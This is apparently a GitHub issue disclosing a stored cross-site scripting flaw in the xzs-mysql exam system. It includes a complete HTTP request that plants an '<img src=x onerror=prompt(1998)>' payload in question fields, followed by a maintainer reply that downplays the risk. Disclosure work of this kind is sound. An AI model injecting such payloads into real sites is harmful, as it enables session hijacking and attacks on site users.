### ISSUE TITLE
There is a persistent cross-site scripting vulnerability

### ISSUE THREAD

**Issue by milkii0** [mindskip/xzs-mysql#490]
Vulnerability Description：
The vulnerability is due to javascript Obtain url Parameters , Without any filtration , Treat directly as a Label and img Labelling href Attribute and src Attribute output .

Data pack：
```
POST /api/admin/question/edit HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/admin/index.html
Content-Type: application/json
request-ajax: true
Content-Length: 498
Origin: http://127.0.0.1:8000
DNT: 1
Connection: close
Cookie: sidebarStatus=0; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1658886486; Hm_lpvt_cd8218cd51f800ed2b73e5751cb3f4f9=1658887593; JSESSIONID=yC_0Q-HGJHzKZvQ8miXfyLKXQV6zca-AA50EtAEy; adminUserName=admin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"id":1,"questionType":1,"subjectId":1,"title":"<img src=x onerror=prompt(1998)>","gradeLevel":1,"items":[{"prefix":"A","content":"<img src=x onerror=prompt(1998)>","score":null,"itemUuid":null},{"prefix":"B","content":"b","score":null,"itemUuid":null},{"prefix":"C","content":"c","score":null,"itemUuid":null},{"prefix":"D","content":"d","score":null,"itemUuid":null}],"analyze":"test<img src=\"null\" alt=\"test.png\"/>","correctArray":null,"correct":"A","score":1,"difficult":5,"itemOrder":null}
```
click on “题目列表”：
![image](https://user-images.githubusercontent.com/34911111/184808364-ebc3f2c0-d573-4ce1-921f-8d830c82a94e.png)
click on “编辑”
![image](https://user-images.githubusercontent.com/34911111/184808388-afa38ec7-d07d-4896-8332-3d2e83f58dfd.png)
There are two places where xss is stored.
![image](https://user-images.githubusercontent.com/34911111/184808422-73b33593-a2b7-40b3-b590-cdf5a983c7f8.png)
Test screenshot：
![image](https://user-images.githubusercontent.com/34911111/184808443-301a48d2-95c5-4705-b51d-9fd17e363f3a.png)
front desk view，successful attack：
![image](https://user-images.githubusercontent.com/34911111/184808462-77a80f7c-5580-4b79-b531-1f0fa3e5eb8d.png)

**Comment by alvis-u** [comment]
admin website not give common user。admin user majority don't understand the technology
